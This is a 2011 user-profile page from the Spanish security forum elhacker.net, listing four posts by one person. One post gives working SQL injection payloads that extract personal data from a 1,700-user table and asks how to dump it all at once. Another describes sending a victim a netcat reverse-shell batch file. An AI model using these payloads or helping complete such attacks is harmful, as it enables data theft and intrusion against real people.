elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


  Mostrar Temas
Páginas: [1]
1  Seguridad Informática / Nivel Web / Obtener todos los datos al mismo tiempo con SQLinjections en: 24 Julio 2011, 17:54 pm
Hola a todos, sigo con dudas de SQL injections (que no pude resolver solito).

Si quiero imprimir en pantalla todos los datos de todos los usuarios al mismo tiempo,¿ como tendría que hacer?
 Por que puedo hacerlo de 1 en 1 , con un "limit+1,1--"
Código: [Seleccionar]
(id=-1+union+all+select+1,concat(nombre,0x3a3a,apellido1,0x3a3a,apellido2,0x3a3a,username,0x3a3a,email,0x3a3a,empresa,0x3a3a,direccion,0x3a3a,telefono,0x3a3a,localidad,0x3a3a,codigo_postal,0x3a3a,pais),3,4,5,6,7+from+usuarios+limit+1,1--
Código: [Seleccionar]
(id=-1+union+all+select+1,concat(nombre,0x3a3a,apellido1,0x3a3a,apellido2,0x3a3a,username,0x3a3a,email,0x3a3a,empresa,0x3a3a,direccion,0x3a3a,telefono,0x3a3a,localidad,0x3a3a,codigo_postal,0x3a3a,pais),3,4,5,6,7+from+usuarios+limit+2,1--
, pero el problema es que son 1700 usuarios que quiero imprimirle los datos, ¿se puede todos al mismo tiempo?
2  Comunicaciones / Redes / Problema con el Netcat en: 20 Mayo 2011, 21:28 pm
Hola a todos.

Mi problema es el siguiente: el netcat no me funciona. Lo que pasa es que yo hago todo lo de los tutoriales , y a la hora de mandárselo a una víctima, aún cuando abre el archivo con el nc + un .bat ( reverse shell), mi netcat se queda en "listening" y no se recibe la conexión. Ya probé con reverse shell, con direct shell y con pipes , pero nada funciona.

Supongo que tengo que abrir un puerto , pero ya lo intente en el Firewall, y a pesar de que esta "creado" y "activado" no funciona. Escanee mi Ip en busca de puertos,y tenias 3, los cuales aun que los ponga en el nc no me funciona.

Les agradecería que me puedan ayudar.

PD: tengo un módem Huawei echolife hg520c, supongo que no debo abrir los puertos por el módem , ¿o si?
3  Programación / Scripting / Enviar un programa hecho en Python en: 13 Mayo 2011, 02:52 am
Hola comunidad, mi duda es la siguiente: ¿cómo puedo mandar un archivo que hice con el lenguaje de programación Python, a un amigo que no tiene el interprete? Osea, para que pueda ejecutarlo sin problemas.

Desde ya muchas gracias
4  Comunicaciones / Redes / Problema con abrir puerto en el modem huawei echolife hg520c en: 12 Mayo 2011, 02:27 am
Hola a todos, soy nuevo en el foro y este es mi primer tema:

Es una duda, miren no puedo abrir puertos con el modem huawei echolife hg520c, ya que , cuando voy a la opción de FIREWALL ( que según los tutoriales aquí agrego puertos) solo me aparece la opción FIREWALL y SPI , y para ponerlos en "disable" y en "enable".

Les agradecería que me respondan , gracias por el foro :D
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines